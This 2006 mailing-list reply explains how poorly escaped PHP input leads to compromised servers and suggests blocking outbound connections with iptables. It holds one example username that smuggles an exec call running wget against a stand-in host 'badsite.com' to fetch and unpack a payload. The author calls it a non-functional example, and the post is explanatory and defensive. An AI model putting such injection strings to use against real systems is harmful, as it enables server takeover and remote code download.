[CS-FSLUG] PHP vulnerabilities?
Tim Young
Tim.Young at LightSys.org
Fri Jun 2 08:42:15 CDT 2006
There are quite a number of ways to do this sort of thing. Most of the
time it is a poorly written PHP (or other language) script. The basic
thing is when you give someone the ability to input something. For
example, a username.
Instead of having a username "Tim", they use something like:
"Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
badfile.tgz')\""
If whoever wrote the php program did not properly escape the variables
on the way in, there is a decent chance that the variable will be used
in some context where it will be executed.
The reason such things occur is because most people, when they are
programming PHP, do not read up on PHP security (from the PHP online
docs). They have some really good information in the contributed
portions of the documentation.
No matter how well you lock down the server itself, if the code you run
on the server is poorly written, it can still be compromised. :)
There are a few good ways to thwart this sort of behavior. A very
simple way, if you cannot program PHP securely, is to use iptables to
disallow outgoing connections from being originated from the server
itself (only allow response packets.) Then someone would need to
compromise root to gain the permission to remove your iptables before
they can download files...
- Tim Young
Ps. The code I gave was a non-functional example. It is close to what
would be used, though it should not work breaking into anything. If you
want to have real-life examples that do work, read the PHP security pages.
Ed Hurst wrote:
> Legatus wrote:
>
>
>> of folks. The file probably doesn't exist. It is probably a embedded in
>> a PHP script, and the query string calls a function that then generates
>> the the file for download. The offending file was probably injected
>> using a buffer overflow or other vulnerability in PHP, or by accessing
>> another site on the same server that has a flaky file upload script,
>> that will allow people to add a full path the the file they are
>> uploading, thus putting the file exactly where they want. There are
>> probably a hundred other ways to do this.
>>
>
> So this is likely generated by a script? Obviously I know nothing of
> PHP, aside from reading about vulnerabilities. I'm guessing a standard
> script is replaced by the cracker, which adds this extra capability
> undetected, eh?
>
>
More information about the Christiansource
mailing list